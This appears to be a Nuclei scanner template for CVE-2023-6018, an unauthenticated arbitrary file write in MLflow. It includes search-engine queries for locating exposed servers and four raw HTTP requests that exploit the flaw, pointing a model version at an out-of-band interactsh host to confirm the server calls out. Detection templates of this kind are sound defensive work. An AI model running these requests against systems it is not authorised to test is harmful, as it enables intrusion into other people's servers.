id: CVE-2023-6018 info: name: Mlflow - Arbitrary File Write author: byt3bl33d3r severity: critical description: | An attacker can overwrite any file on the server hosting MLflow without any authentication. reference: - https://huntr.com/bounties/7cf918b5-43f4-48c0-a371-4d963ce69b30/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6018 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6018 cwe-id: CWE-78 epss-score: 0.86232 epss-percentile: 0.98574 cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" fofa-query: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects variables: model_name: "{{rand_text_alpha(6)}}" http: - raw: - | POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{model_name}}"} - | POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"} - | POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{model_name}}", "source": "models:/{{model_name}}/1"} - | GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: body_1 words: - '"registered_model":' - '"name":' condition: and # digest: 4a0a0047304502210099d1acabd37ecf0040ced0da3af09a84bf196bdafe114d2713bca0d04afb379702201a3d094b47d82e82dbe775c0a58c39a548a6f67d656ffa37c1c45a5d5d43591b:922c64590222798bb761d5b6d8e72950